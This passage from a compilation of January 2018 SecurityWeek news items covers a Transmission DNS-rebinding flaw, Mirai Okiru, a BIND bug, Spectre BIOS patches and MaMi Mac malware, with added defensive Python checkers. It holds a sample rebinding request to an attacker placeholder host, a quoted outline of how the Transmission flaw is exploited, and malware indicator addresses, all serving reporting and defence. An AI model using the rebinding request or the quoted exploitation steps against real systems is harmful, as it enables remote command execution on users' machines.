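        return False                         # any other hostname is a rebinding candidate


def parse_request_headers(raw: bytes) -> dict:
    """Minimal parser: lower-cased header names -> values for one HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:      # skip the request line
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return headers


def accept_rpc_request(raw: bytes, peer_ip: str, extra_allowed=()) -> bool:
    """Accept only if the TCP peer is loopback AND the Host header is local."""
    if not ipaddress.ip_address(peer_ip).is_loopback:
        return False
    return host_header_is_local(parse_request_headers(raw).get("host"), extra_allowed)


# Constructed sample requests: a genuine local client and a rebound browser request.
LEGIT_REQUEST = (b"POST /rpc HTTP/1.1\r\nHost: 127.0.0.1:9091\r\n"
                 b"Content-Type: application/json\r\n\r\n{}")
REBOUND_REQUEST = (b"POST /rpc HTTP/1.1\r\nHost: rebind.attacker.example:9091\r\n"
                   b"Origin: http://rebind.attacker.example\r\n\r\n{}")

if __name__ == "__main__":
    print("local client :", accept_rpc_request(LEGIT_REQUEST, "127.0.0.1"))    # True
    print("rebound page :", accept_rpc_request(REBOUND_REQUEST, "127.0.0.1"))  # False
```

Both requests reach the daemon from a loopback peer, so only the Host check separates them. An operator who legitimately exposes the service under another name adds it through `extra_allowed` rather than by loosening the check, which is the same allowlist shape that a Host-header defence against rebinding needs in any localhost-bound web API.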

“Exploitation is simple, you could set script-torrent-done-enabled and run any command, or set download-dir to /home/user/ and then upload a torrent for ‘.bashrc’,” Ormandy explained.

The expert says he has successfully tested his proof-of-concept (PoC) exploit with Chrome and Firefox running on Windows and Linux.

The vulnerability, tracked as CVE-2018-5702, was reported to Transmission developers on November 30, and Ormandy even provided a fix the next day. However, an official patch still has not been released, which the researcher says is highly unusual for open source projects.

Ormandy pressed the developers and last week they agreed to make his patch public on GitHub so that at least downstream distributions such as Debian and Fedora can roll out their own patches. It’s unclear when an official patch will become available, but it should be included in the next 2.93 release.

Transmission developers pointed out that the macOS and Linux versions are only vulnerable if remote access is enabled; the feature is disabled by default.

Sebastian Lekies, who also works for Google, said he reported the same vulnerability to Transmission developers five years ago, but never heard back from them.

Back in 2016, hackers broke into the Transmission website and planted a malicious installer designed to deliver a new OS X ransomware.


Mirai Variant Targets ARC CPU-Based Devices
17.1.2018 securityweek BotNet

A newly discovered variant of the Mirai Internet of Things (IoT) botnet is targeting devices with ARC (Argonaut RISC Core) embedded processors, researchers warn.

Dubbed Okiru, the new malware variant appears to be different from the Satori botnet, although the latter was also called Okiru by its author. Security researchers analyzing the new threat have discovered multiple differences between the two Mirai versions, aside from the targeting of the ARC architecture.

Originally designed by ARC International, the ARC processors are 32-bit CPUs widely used in system on chip (SOC) devices for storage, home, mobile, automotive, and IoT applications. Each year, over 1.5 billion devices are shipped with ARC processors inside.

Mirai Okiru represents the very first known malware targeting ARC processors, independent security researcher Odisseus, who analyzed the threat, notes.

The botnet was discovered by @unixfreaxjp from malwaremustdie.org, the security researcher who spotted the first Mirai variant in August 2016. In a post on reddit, the researcher explained that, although distributed denial of service (DDoS) is the main purpose of the last two Mirai versions, they are very different.

One of the characteristics that sets them apart is the configuration, which in Okiru is encrypted in two parts, with the telnet brute-force password list also encrypted; Satori neither splits its configuration in two nor encrypts its default password list. Moreover, the new malware variant can use up to 114 credentials for its telnet attack, while Satori uses a different and shorter database.

The researcher also explains that Okiru appears to lack the "TSource Engine Query" distributed reflective denial of service (DRDoS) attack function over random UDP ports that Satori has. The two also differ in the infection follow-up commands written in their configurations and in their use of the watchdog.

Okiru was found to have four types of router attack exploit code hard coded in it, none of which is found in Satori. Furthermore, there are small embedded ELF Trojan downloaders in Satori, which are used to download other architecture binaries (these were coded differently compared to Okiru ones).

Last week, when the researchers first noticed Okiru’s attacks, the malware enjoyed low detection in VirusTotal. Thus, and because the new threat is targeting devices that haven’t been hit by malware previously, researchers expect an uptick in Mirai infections.

It is also clear that the actor behind the botnet is actively following reports on the malware. Within minutes after ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group member Pierluigi Paganini wrote about Okiru, his website was hit with a DDoS attack that lasted over an hour, Italy’s CERT-PA revealed (translated).


DNS Servers Crash Due to BIND Security Flaw
17.1.2018 securityweek Vulnerability

Updates released by the Internet Systems Consortium (ISC) for BIND patch a remotely exploitable security flaw that has caused some DNS servers to crash.

The high severity vulnerability, tracked as CVE-2017-3145, is caused by a use-after-free bug that can lead to an assertion failure and crash of the BIND name server (named) process.

“BIND was improperly sequencing cleanup operations on upstream recursion fetch contexts, leading in some cases to a use-after-free error that can trigger an assertion failure and crash in named,” ISC said in an advisory.

While there is no evidence that this vulnerability has been exploited in malicious attacks, ISC says crashes caused by the bug have been reported by “multiple parties.” The impacted systems act as DNSSEC validating resolvers, and temporarily disabling DNSSEC validation can be used as a workaround.

The vulnerability, discovered by Jayachandran Palanisamy of Cygate AB, affects BIND versions 9.9.9-P8 to 9.9.11, 9.10.4-P8 to 9.10.6, 9.11.0-P5 to 9.11.2, 9.9.9-S10 to 9.9.11-S1, 9.10.5-S1 to 9.10.6-S1, and 9.12.0a1 to 9.12.0rc1. It has been patched with the release of BIND 9.9.11-P1, 9.10.6-P1, 9.11.2-P1 and 9.12.0rc2.

“Addresses could be referenced after being freed during resolver processing, causing an assertion failure. The chances of this happening were remote, but the introduction of a delay in resolution increased them. (The delay will be addressed in an upcoming maintenance release.),” ISC explained.

The organization has also informed users of CVE-2017-3144, a medium severity DHCP vulnerability affecting versions 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, and 4.3.0 to 4.3.6.

“By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server,” ISC explained.

“Once exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.,” it added.

ISC has developed a patch and it plans on adding it to a future maintenance release of DHCP. In the meantime, users can protect themselves against potential attacks by disallowing access to the OMAPI control port from unauthorized clients. Alternatively, organizations can obtain the patch from ISC and integrate it into their own code.


Serious Flaws Found in Phoenix Contact Industrial Switches
17.1.2018 securityweek Vulnerability

Vulnerabilities in Phoenix Contact Industrial Switches Can Allow Hackers to Disrupt Operations

Researchers have discovered potentially serious vulnerabilities in industrial switches made by Phoenix Contact, a Germany-based company that specializes in industrial automation, connectivity and interface solutions.

According to advisories published last week by ICS-CERT and its German counterpart CERT@VDE, Phoenix Contact’s FL SWITCH industrial ethernet switches are affected by authentication bypass and information exposure flaws. Ilya Karpov and Evgeniy Druzhinin of Positive Technologies have been credited for reporting the flaws.

Vulnerabilities found in Phoenix Contact industrial switches

The security holes affect 3xxx, 4xxx and 48xx series switches running firmware versions 1.0 through 1.32. The vendor addressed the weaknesses in version 1.33, but researchers told SecurityWeek that it took the company roughly 160 days to release patches, which they haven’t been able to verify.

The more serious of the flaws is tracked as CVE-2017-16743 and it has been assigned a CVSS score of 9.8, which puts it in the “critical severity” category. The vulnerability allows a remote, unauthenticated attacker to bypass authentication and gain administrative access to the targeted device by sending it specially crafted HTTP requests.

The second flaw, CVE-2017-16741, has been rated “medium severity” and it allows a remote and unauthenticated attacker to abuse a device’s Monitor mode in order to read diagnostics information. Firmware version 1.33 allows users to disable the Monitor mode.

Positive Technologies researchers told SecurityWeek that attackers can exploit the vulnerabilities to gain full control of a targeted switch and leverage it to interrupt operations in the ICS network, which can have serious consequences.

While some Phoenix Contact products do appear to be connected directly to the Internet, experts have not found any of its industrial switches on search engines such as Shodan and Censys. Positive Technologies says these industrial switches are typically used for internal PLC networks.

“This does not mean that such devices could not be found and accessed from the internet, it only means that we were not able to find such cases using shodan.io and censys.io,” researchers said.


Device Manufacturers Working on BIOS Updates to Patch CPU Flaws
17.1.2018 securityweek Vulnerability

Acer, Asus, Dell, Fujitsu, HP, IBM, Lenovo, Panasonic, Toshiba and other device manufacturers have started releasing BIOS updates that should patch the recently disclosed Spectre and Meltdown vulnerabilities.

The flaws exploited by the Meltdown and Spectre attacks, tracked as CVE-2017-5715, CVE-2017-5753 and CVE-2017-5754, allow malicious applications to bypass memory isolation mechanisms and access sensitive data. Billions of PCs, servers, smartphones and tablets using processors from Intel, AMD, ARM, IBM and Qualcomm are affected.


Fortunately, tech companies have already started releasing patches and workarounds designed to prevent attacks. Unfortunately, some of the mitigations can introduce significant performance penalties for certain types of operations.

Intel has released patches, including microcode updates, for many of its processors, and AMD has promised to do the same. Intel has provided the fixes to system manufacturers and they have already released or are in the process of releasing BIOS updates.
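Applying a vendor BIOS update is only half the job; an administrator also wants proof that the new microcode actually loaded and that the operating system reports the mitigations as active. The following Python script is an added example and is not code from SecurityWeek or from any vendor named in this article. It parses the `microcode` field that Linux exposes per logical CPU in `/proc/cpuinfo` and the per-vulnerability status files under `/sys/devices/system/cpu/vulnerabilities/` (present on kernels that carry the Meltdown/Spectre mitigation patches). The `/proc/cpuinfo` text and sysfs contents embedded in the block are constructed samples, and `REQUIRED_REVISION` is a placeholder that must be replaced with the revision listed in the vendor's release notes.

```python
from pathlib import Path

# Constructed sample of /proc/cpuinfo (two logical CPUs), used when running off-box.
SAMPLE_CPUINFO = """\
processor\t: 0
vendor_id\t: GenuineIntel
model name\t: Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz
microcode\t: 0xc2

processor\t: 1
vendor_id\t: GenuineIntel
model name\t: Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz
microcode\t: 0xc2
"""

# Constructed sample of /sys/devices/system/cpu/vulnerabilities/* contents.
SAMPLE_VULN_FILES = {
    "meltdown": "Mitigation: PTI",
    "spectre_v1": "Mitigation: __user pointer sanitization",
    "spectre_v2": "Vulnerable: Minimal generic ASM retpoline",
}


def parse_microcode(cpuinfo_text):
    """Return {processor_number: microcode_revision} parsed from /proc/cpuinfo text."""
    revisions = {}
    current = None
    for line in cpuinfo_text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue  # blank separator line between CPUs
        key, value = key.strip(), value.strip()
        if key == "processor":
            current = int(value)
        elif key == "microcode" and current is not None:
            revisions[current] = int(value, 16)
    return revisions


def microcode_at_least(cpuinfo_text, required_revision):
    """True only if every logical CPU reports a microcode revision >= required_revision."""
    revisions = parse_microcode(cpuinfo_text)
    return bool(revisions) and all(rev >= required_revision for rev in revisions.values())


def parse_vulnerability_status(files):
    """Map each sysfs vulnerability file to 'mitigated', 'not affected' or 'vulnerable'."""
    status = {}
    for name, content in files.items():
        text = content.strip()
        if text.startswith("Mitigation:"):
            status[name] = "mitigated"
        elif text.startswith("Not affected"):
            status[name] = "not affected"
        else:
            status[name] = "vulnerable"
    return status


def read_vulnerability_files(base="/sys/devices/system/cpu/vulnerabilities"):
    """Read the live sysfs directory; empty dict on kernels that do not expose it."""
    base_path = Path(base)
    if not base_path.is_dir():
        return {}
    return {p.name: p.read_text() for p in base_path.iterdir() if p.is_file()}


def unmitigated(files):
    """Names of vulnerabilities whose sysfs file does not report a mitigation."""
    return sorted(n for n, s in parse_vulnerability_status(files).items() if s == "vulnerable")


if __name__ == "__main__":
    REQUIRED_REVISION = 0xc2  # placeholder: take the value from the vendor's BIOS release notes
    cpuinfo_path = Path("/proc/cpuinfo")
    cpuinfo = cpuinfo_path.read_text() if cpuinfo_path.exists() else SAMPLE_CPUINFO
    files = read_vulnerability_files() or SAMPLE_VULN_FILES
    print("microcode revisions:", {k: hex(v) for k, v in parse_microcode(cpuinfo).items()})
    print("microcode up to date:", microcode_at_least(cpuinfo, REQUIRED_REVISION))
    print("still unmitigated:", unmitigated(files))
```

A microcode revision that did not change after the BIOS update usually means the update was not applied to all sockets or the OS loaded an older microcode file on top of it; both cases need follow-up before the host is counted as patched.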

Acer

Acer has informed customers that the Spectre and Meltdown vulnerabilities affect many of its desktop, notebook and server products. It’s unclear when BIOS updates will become available for a majority of the impacted devices, but the company has set a target date of March 2018 for server updates.

The list of impacted products includes Aspire, Extensa, Gateway, imd, Predator, Revo, ShangQi, Veriton and Wenxiang desktops; Aspire, Extensa, Gateway, Nitro, Packard Bell EasyNote, Spin, Swift, Switch, and TravelMate notebooks; and Altos, AR, AT, AW and Veriton servers.

Asus

Asus is also working on releasing BIOS updates. The company expects to release patches for affected laptops, desktops and mini PCs by the end of the month.

Asus has published a separate security advisory for motherboards that support Intel processors vulnerable to Meltdown and Spectre attacks.

Dell

Dell has already started releasing BIOS updates for affected Alienware, Inspiron, Edge Gateway, ChengMing, Enterprise Server, Latitude, OptiPlex, Precision, Vostro, Venue and XPS products. The vendor expects many more updates to become available later this month.

Dell has published a separate advisory for EMC products, including PowerEdge and Datacenter Scalable Solutions (DSS). Updates are available for many of the impacted systems.

Fujitsu

Fujitsu has informed customers that many of its OEM mainboards, Esprimo PCs, Celsius workstations, Futuro thin clients, Stylistic, Lifebook and Celsius notebooks, Celvin storage devices, Primergy and Primequest servers, Sparc servers, and retail products are affected. However, BIOS updates are available only for a handful of them.

Intel

Intel has started integrating the processor microcode fixes into BIOS updates for NUC, Compute Stick and Compute Card mini PCs. Updates are available for many of the products and more are expected to be released later this month.

The company is also working on updates for Server Board and Visual Compute Accelerator products, but only two BIOS updates have been released to date. Intel has not provided an estimate on when more updates should become available.

HP

HP has started releasing BIOS updates that patch the Meltdown and Spectre vulnerabilities for commercial workstations; commercial desktops, notebooks and retail PoS devices; and consumer desktops and notebooks.

Updates for the remaining systems are expected to become available later this month or in early February.

Lenovo

Lenovo says many of its desktop, IdeaPad, ThinkStation, Converged and ThinkAgile, storage, Hyperscale, ThinkServer, ThinkSystem, System X, network switch, and server management products are affected.

Lenovo has released BIOS updates for many of its solutions, and the company has also advised users to update their operating system and NVIDIA drivers to ensure that they are protected against Meltdown and Spectre attacks.

Gigabyte and MSI motherboards

Gigabyte has a long list of impacted motherboards, including the Z370, X299, B250, H110, Z270, H270, Q270, Z170, B150 and H170 families. The company has promised to start releasing BIOS updates in the next few days, with updates for a majority of systems expected to become available over the next few weeks.

MSI has released BIOS updates for Z370, Z270, H270, B250, Z170, H170, B150, H110, X299 and X99 motherboards. Patches are expected to become available for other devices “very soon.”

Others

IBM has released firmware patches for some of its POWER processors. Fixes for its AIX and IBM i operating systems are expected to become available in mid-February.

Getac Technology, a Taiwan-based firm that makes rugged notebook, tablet and handheld computers, has promised to release BIOS updates by the end of this month.

Toshiba has published a list of affected Qosmio, Satellite, Portege, Tecra, Chromebook, Kirabook, AIO, Regza, Mini Notebook, Encore, Excite and dynaPad devices, but it has yet to release any updates. Some of the fixes are expected later this month.

Data center hardware provider QCT says it has integrated the microcode patches into a majority of its recent products. Super Micro has also issued fixes for many of its single, dual and multi-processor systems; SuperBlade, MicroBlade and MicroCloud products; and embedded, workstation and desktop systems.

Computing and storage solutions provider Wiwynn has released BIOS updates for its SV300G3, SV7200G3, SV5100G3 and SV5200G3 products, and more are expected to become available over the next few weeks.

Panasonic hopes to release updates for its laptops and tablets over the next few months.


Islamic State Retreats Online to 'Virtual Caliphate'
17.1.2018 securityweek CyberCrime

On the brink of defeat in Iraq and Syria, the Islamic State group has been taking refuge in its "virtual caliphate" -- but even online, experts say it is in decline.

Back in 2015, when the jihadists held territory the size of Italy, they also commanded a huge digital presence, flooding the web with slick propaganda lionising their fighters and romanticising life under their rule.

Today, with many of the top IS leaders either dead or on the run, what remains of the group's once-sophisticated propaganda machine is also a shadow of its former self.

Their media centres destroyed, remaining propagandists find themselves struggling to maintain an internet connection while battling surveillance from international intelligence services.

The jihadist group is less and less vocal on the web, largely leaving supporters whom it cannot control to speak in its name.

"It's almost as if someone has pressed the mute button on the Islamic State," said Charlie Winter, a researcher at King's College London who has been studying IS communications for years.

Between November 8 and 9 the group even went completely silent for a full 24 hours in what Winter said was an "unprecedented" break from social media.

In 2015, when IS was ruling over roughly seven million people in Iraq and Syria, its propagandists produced "content from 38 different media offices from West Africa to Afghanistan", Winter said.

But by December, more than three quarters of these outlets had been "almost totally silenced," he added.

Albert Ford, a researcher at US think-tank New America who has studied the exodus of foreign fighters to join IS, also said the group's media output was "falling off considerably".

"Fewer places to get information, fewer ways to upload it," he said.

- Pushed to the 'dark web' -

Back in March as Iraqi forces were ousting IS from their long-held bastion Mosul, an AFP journalist was able to pick through the wreckage of what was once a jihadist media centre.

Between the burnt walls of the villa in an upscale part of the city were the remains of computers, printers and broadcasting equipment.

In the months before and since, the US-led military coalition fighting IS has repeatedly announced the deaths of senior IS communications officers, usually in air strikes.

Among them was the top strategist and spokesman Abu Mohamed al-Adnani, killed in a US strike in northern Syria in August 2016.

These days IS propagandists mostly use the web to encourage supporters to launch attacks on their own initiative, with the much-weakened group unable to play a direct hand in organising them.

These calls are often issued via the "dark web", sites reachable only through anonymising networks and therefore almost impossible to regulate, or via the Telegram app.

Winter said he had seen a trend emerging of posts seeking to cultivate a sense of nostalgia among supporters for the height of the group's power.

By portraying the events of three years ago as a "golden age" stolen by "the enemies of Islam", IS is hoping to convince new recruits that such times could come again if they join the cause, Winter said.

Bruce Hoffman, a terrorism specialist at Georgetown University in Washington, said the principal danger of IS now lies in what he calls "enabled attackers".

A jihadist recruit such as this would have "no previous ties to terrorist organisations," Hoffman said.

"But he is furnished very specific targeting instructions and intelligence in order to better facilitate and ensure the success of his attack."

Such wannabe jihadists need look no further than the internet for abundant advice that has been available online for years -- and will merely pop up again after any attempt to remove it.


'MaMi' Mac Malware Hijacks DNS Settings
17.1.2018 securityweek Apple

Researcher Patrick Wardle has analyzed what seems to be a new piece of malware designed to hijack DNS settings on macOS devices. The threat has other capabilities as well, but they do not appear to be active.

The malware, dubbed OSX/MaMi by Wardle based on a core class named “SBMaMiSettings,” is currently only detected – at least based on its signature – by ESET and Ikarus products as OSX/DNSChanger.A and Trojan.OSX.DNSChanger. However, other vendors will likely create signatures for the threat in the upcoming hours and days.

The researcher obtained a sample of MaMi after a user reported on the Malwarebytes forums that a teacher’s Mac had been infected. The user reported that the DNS servers on the compromised system were set to 82.163.143.135 and 82.163.142.137, and they kept changing back after being removed.

Wardle has not been able to determine how the malware is being distributed, but he has found it on several websites. The expert believes the threat has likely been delivered via email, fake security alerts and pop-ups on websites, or social engineering attacks.

The sample analyzed by the researcher acts as a DNS hijacker, but it also contains code for taking screenshots, simulating mouse events, downloading and uploading files, and executing commands.

The malware does not appear to execute any of these functions, but Wardle says it’s possible that they require some attacker-supplied input or other preconditions that his virtual machine may not have met. The researcher says he will continue to investigate.

Once it infects the system, the malware invokes the macOS security command-line tool and uses it to install a new certificate downloaded from a remote location.

“OSX/MaMi isn't particularly advanced - but does alter infected systems in rather nasty and persistent ways,” Wardle explained. “By installing a new root certificate and hijacking the DNS servers, the attackers can perform a variety of nefarious actions such as man-in-the-middle'ing traffic (perhaps to steal credentials, or inject ads).”

The easiest way to determine if a macOS system is infected with the MaMi malware is to check the DNS settings: the threat is likely present if the servers are set to 82.163.143.135 and 82.163.142.137. The root certificate the malware installs is a second indicator. The malware does not appear to be designed to target Windows devices.
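The DNS check described above can be scripted so that it runs across a fleet rather than by hand. The following Python script is an added example, not part of Wardle's write-up: it reads the resolver list from `scutil --dns` on macOS, extracts every `nameserver[n]` entry, and reports any that match the two addresses associated with MaMi. The `scutil` output embedded in the block is a constructed sample (not a real capture) so the parser can be exercised on a machine that is not a Mac; on a Mac the live output is used instead.

```python
import re
import subprocess

# Resolver addresses reported for OSX/MaMi.
MAMI_DNS_SERVERS = {"82.163.143.135", "82.163.142.137"}

# Constructed sample of `scutil --dns` output as it would look on an infected Mac.
SAMPLE_SCUTIL_DNS = """\
DNS configuration

resolver #1
  search domain[0] : example.lan
  nameserver[0] : 82.163.143.135
  nameserver[1] : 82.163.142.137
  if_index : 5 (en0)
  flags    : Request A records
  reach    : 0x00000002 (Reachable)

resolver #2
  domain   : local
  options  : mdns
  timeout  : 5
  flags    : Request A records
  reach    : 0x00000000 (Not Reachable)
  order    : 300000
"""

# Matches lines such as "  nameserver[0] : 82.163.143.135" in scutil output.
NAMESERVER_RE = re.compile(r"^\s*nameserver\[\d+\]\s*:\s*(\S+)", re.MULTILINE)


def parse_scutil_nameservers(text):
    """Return the set of nameserver addresses listed anywhere in `scutil --dns` output."""
    return set(NAMESERVER_RE.findall(text))


def mami_indicators(nameservers, iocs=MAMI_DNS_SERVERS):
    """Return the configured resolvers that match the MaMi addresses, sorted."""
    return sorted(set(nameservers) & set(iocs))


def current_macos_nameservers():
    """Collect resolvers from the live system; empty set if scutil is unavailable."""
    try:
        out = subprocess.run(["scutil", "--dns"], capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return set()
    return parse_scutil_nameservers(out)


if __name__ == "__main__":
    servers = current_macos_nameservers() or parse_scutil_nameservers(SAMPLE_SCUTIL_DNS)
    hits = mami_indicators(servers)
    print("configured resolvers:", sorted(servers))
    print("MaMi indicators:", hits or "none")
```

Because the malware resets the resolvers after they are removed, a clean DNS list on its own does not prove the machine is clean; the check is a triage signal, and the persistence mechanism and the installed certificate still have to be dealt with.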

The best known DNS-changer malware is DNSChanger, a threat that made the rounds in the years leading up to 2011 and which changed DNS settings as part of click fraud and ad replacement schemes. DNSChanger affected both Windows and OS X machines, and millions of devices worldwide were at risk of losing Internet connectivity after authorities took down its infrastructure.


Microsoft Brings End-to-End Encryption to Skype
17.1.2018 securityweek Social

Microsoft this week announced that end-to-end encrypted communications are now available for preview to Skype insiders.

Called Private Conversations, the newly introduced feature secures both text chat messages and audio calls, Microsoft Program Manager Ellen Kilbourne revealed.

Furthermore, end-to-end encryption is also applied to any files users send to their conversation partners, including images, audio files, and videos. The contents of these conversations are hidden in the chat list and do not appear in notifications either, to keep users' information private.

Private Conversations, Kilbourne explains in a post, is using the industry standard Signal Protocol by Open Whisper Systems. The protocol is already providing end-to-end encryption to users of popular messaging applications such as Signal, WhatsApp, and Facebook Messenger.

Users enrolled in Microsoft’s Skype Insider program can already test the new feature by selecting “New Private Conversation” from the compose menu or from the recipient’s profile. As soon as the recipient has accepted the invitation to a private chat, all calls and messages in that conversation will be encrypted end-to-end, until they choose to end it.

Participation in a private conversation will be available from a single device at a time. Skype users will have the possibility to switch the conversation to any of their devices, but exchanged messages are tied to the device being used at the time.

During the preview period, private conversations will be available only to Skype Insiders running the latest version of the application. The chats are also limited to one-to-one conversations, Kilbourne explains.

The Private Conversations feature is currently available to Skype Insiders using Skype version 8.13.76.8 for iOS, Android, Linux, Mac, and Windows Desktop.


Facebook Paid $880,000 in Bug Bounties in 2017
17.1.2018 securityweek Social

Facebook received over 12,000 vulnerability submissions in 2017 and ended up paying $880,000 in bug bounties to security researchers.

Of the large number of received submissions, however, just over 400 reports were found valid during the bug bounty program’s sixth year. Last year, Facebook also paid larger bounties to the submitting researchers, as the average reward per submission increased to almost $1,900, up from $1,675 in 2016.

The number of security researchers participating in the company’s bug bounty program also increased, Jack Whitton, Security Engineer with Facebook's Product Security team, explains in a blog post. 32% of the researchers who received a reward last year submitted for the first time in 2017.

The largest bounty the company has paid to date is a $40,000 reward for ImageTragick, a remote code execution vulnerability in the ImageMagick image processing suite. Last year, the company also paid a $10,000 bounty for a critical vulnerability that could have allowed the deletion of any photo from the social media network.

The largest number of valid submissions in 2017, Facebook says, came from India. The United States came second, followed by Trinidad & Tobago in third place.

Facebook acknowledged more than 100 researchers as part of the bug bounty program in 2017.

“Going forward, we are going to take a number of things into consideration: dollar amount, submission validity, and more. We’re doing this to continue to encourage high-quality submissions, and we will be offering new perks to our top participants such as swag and prizes, access to exclusive events and new features,” Whitton explains.

He also reveals that Facebook is planning on investing more resources into getting more timely responses and payments to researchers in 2018.

Researchers interested in submitting reports as part of Facebook’s bug bounty program are encouraged to follow the best practices the company is listing at facebook.com/whitehat/resources.

“After celebrating our 6th anniversary, we paid out over $880,000 to researchers last year, bringing our total paid out to over $6,300,000,” Whitton says.

Facebook launched its bug bounty program in 2011 and paid over $5 million to researchers by October 2016.


US House Passes Crucial Spying Law
17.1.2018 securityweek CyberSpy

The US House of Representatives passed a crucial surveillance law Thursday that reinforced the ability of the country's spy agencies to intercept and make use of Americans' private communications.

The national security establishment saw the reauthorization of the expiring Section 702 of the Foreign Intelligence Surveillance Act as essential, warning that they would not be able to detect terror plots without it.

But rights groups and libertarian-leaning politicians of both the Democratic and Republican parties saw the bill's passage as a blow, especially since former National Security Agency contractor Edward Snowden revealed in 2013 that the NSA was using it to vacuum up massive amounts of data on Americans.

Many had hoped the renewal would strengthen protections against invasive electronic wiretapping and social media monitoring of Americans by the NSA, the country's powerful electronic espionage body, and the Federal Bureau of Investigation.

- Trump tweets stir confusion -

The House's vote for the bill came after President Trump himself sent mixed messages of his own views, tweeting Thursday morning his opposition only to make an abrupt U-turn.

In an initial tweet he said the section 702 provision had been used by the Obama administration to "so badly surveil and abuse the Trump campaign," suggesting he was opposed to the bill.

More than an hour later, he reversed himself, saying "today's vote is about foreign surveillance of foreign bad guys on foreign land. We need it!"

While nearly all lawmakers agree that 702 is an essential tool for US intelligence to safeguard national security, the bill passed the House by 256-164, showing the level of opposition to the powers it gives US spies and law enforcement. The no votes included 45 Republicans.

"The House-passed bill does absolutely nothing to defend the vast majority of law-abiding Americans from warrantless searches, and in many ways it expands the federal government's ability to spy on Americans. A concerted campaign of fear-mongering and misinformation pushed this flawed bill over the line," said Senator Ron Wyden, one of the most vocal critics of the law.

- Post-9/11 law -

Section 702 of the FISA law was passed in 2008 after the Bush administration was shown to have allowed the then-illegal surveillance of telephone and online communications of US citizens and residents in the wake of the September 11, 2001 terror attacks.

Amid concerns it gave the government too much power to spy on citizens, the statute was given a five-year limit, and was renewed in 2012.

It allows the NSA and FBI, in their surveillance on foreign targets outside of the country for national security purposes, to also collect and hold communications by US citizens, so-called incidental collection.

It also permits the CIA and FBI to search that material, which includes social media postings, in the course of criminal investigations.

The NSA and FBI have downplayed their collection and use of the materials on Americans.

But leaks and statements by officials have suggested that the amount of material collected is massive, and that the FBI routinely searches it for information on Americans.

Opponents had hoped the new bill would require agencies to obtain specific warrants to scan and make use of the communications of Americans scooped up in the process of spying on foreigners.

But a slight change that says the FBI needs a warrant to make use of the material in court does not hinder their ability to freely examine NSA files, critics said.

The bill "fails to meaningfully restrict the use of Section 702 to spy on Americans without a warrant," the American Civil Liberties Union said.

The bill could face stronger opposition in the Senate, where Senator Rand Paul has threatened a filibuster. But analysts expect that will only slow its eventual passage.


FireEye Acquires Big Data Firm X15 Software
17.1.2018 securityweek IT

Cyber threat protection firm FireEye said on Friday that it has acquired privately held big data platform provider X15 Software in a deal valued at roughly $20 million.

Under the terms of the acquisition, which closed on Jan. 11, FireEye agreed to pay approximately $15 million in equity and $5 million in cash to acquire Sunnyvale, Calif.-based X15.

FireEye says that X15’s technology will “add significant data management capabilities and provide customers with an open platform for integrating machine-generated data that can easily incorporate new security technologies and big data sources to adapt to the evolving threat environment.”

Shortly after acquiring security orchestration firm Invotas in February of 2016, FireEye made a push into orchestration and automation with the launch of its Security Orchestrator offering, designed to help eliminate repetitive manual processes, reduce process errors, and automate the correct response between different security controls. In late 2016, the company unveiled Helix, a platform designed to help customers efficiently integrate and automate security operations functions.

“Organizations today are overwhelmed by alerts, the number of tools required to manage their security operations, and the challenge of unifying access to the large volumes of data that matter,” John Laliberte, senior vice president of engineering at FireEye, said in a statement. “X15 Software technology will accelerate our strategy of delivering an innovative, next-gen security platform.”

FireEye claims that the integration of X15 Software’s technology will help FireEye’s security operations platform address the challenges of collecting, querying and analyzing large volumes of machine-generated data in real-time and manage security data from on-premise, hybrid and cloud environments.

X15 Software was founded in 2013 and currently has approximately 20 employees.


Tool Detects Squatted Accounts on Social Networks, Code Repos
17.1.2018 securityweek Social

Web security company High-Tech Bridge has improved its Trademark Monitoring Radar service with a feature designed to help organizations identify squatted or fraudulent accounts created on social networks and code repositories.

Trademark Monitoring Radar is a free service that hunts for malicious domain names. The service initially allowed organizations to detect potential cybersquatting and typosquatting of their domain or brand. A feature designed to detect phishing websites was later added.

The latest feature allows organizations to find typosquatting or cybersquatting attempts on social networks and code repositories. Users simply enter the name of their own domain and the service displays a list of potentially squatted accounts found on websites such as Facebook, Twitter, YouTube, Google Plus, GitHub and Bitbucket.
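The core of any such service is generating the near-miss names a squatter would register and then checking which of them exist. The Python block below is an added illustration and is not High-Tech Bridge's code: it builds typosquat variants of a brand name (character omission, doubled character, adjacent transposition, adjacent-key substitution, digit-for-letter homoglyphs) and cybersquat variants (brand plus affixes such as "support" or "official"), then matches them against a list of account names. The account list and the brand "examplecorp" are constructed for the example; fetching real account names from each platform's search API is left to the reader.

```python
import itertools

# Neighbouring keys on a QWERTY keyboard (letters only; enough for username squats).
QWERTY_NEIGHBOURS = {
    "a": "qwsz", "b": "vghn", "c": "xdfv", "d": "serfcx", "e": "wsdr", "f": "drtgvc",
    "g": "ftyhbv", "h": "gyujnb", "i": "ujko", "j": "huikmn", "k": "jiolm", "l": "kop",
    "m": "njk", "n": "bhjm", "o": "iklp", "p": "ol", "q": "wa", "r": "edft", "s": "awedxz",
    "t": "rfgy", "u": "yhji", "v": "cfgb", "w": "qase", "x": "zsdc", "y": "tghu", "z": "asx",
}
# Digit look-alikes that survive the character set most platforms allow in usernames.
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5", "b": "8", "g": "9"}
# Affixes squatters bolt onto a brand to pose as a support or official account.
AFFIXES = ("official", "support", "help", "team", "hq", "app", "login")


def typosquat_variants(brand):
    """Generate typo-style variants of a brand name (case-insensitive)."""
    b = brand.lower()
    variants = set()
    for i in range(len(b)):
        variants.add(b[:i] + b[i + 1:])                         # character omission
        variants.add(b[:i] + b[i] + b[i:])                      # doubled character
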